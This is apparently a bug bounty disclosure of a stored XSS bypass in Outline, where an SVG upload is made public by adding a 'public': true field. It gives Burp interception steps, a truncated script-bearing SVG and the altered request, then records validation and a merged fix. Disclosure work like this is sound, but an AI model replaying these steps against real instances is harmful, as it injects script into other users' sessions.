[Bypass] Cross-site Scriptin (XSS) via file upload in outline/outline


Reported on

Jul 17th 2022

🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass to this report by uploading the file with "public": true, parameter. This is due to the fact that AWS bucket public folder does not auto download files when we access them.

🕵️‍♂️ Proof of Concept

Step 1: Go your outline home and create a new note.


Step 2: Start burp suite with proxy -> Intercept is on.


Step 3: Add in the note, the following .svg file by taping /file and [ENTER].

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">

Step 4: On burp suite, press Forward until you see:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
Connection: close

    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",

Step 5: Add "public": true, inside the JSON.

    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"

Step 6: Forward and turn Intercept to off.


Step 7: Go to your note and click to the file.

  • File


  • XSS


🔨 Fix

To fix this vulnerability, I suggest you to force download on the public part of the AWS bucket too.


An attacker could use it to get sensitive information stored in the AWS bucket.

We are processing your report and will contact the outline team within 24 hours. 17 days ago
We have contacted a member of the outline team and are waiting to hear back 16 days ago
Tom Moor validated this vulnerability 16 days ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 9dd28d 16 days ago
The fix bounty has been dropped
14 days ago

Administrative Help

to join this conversation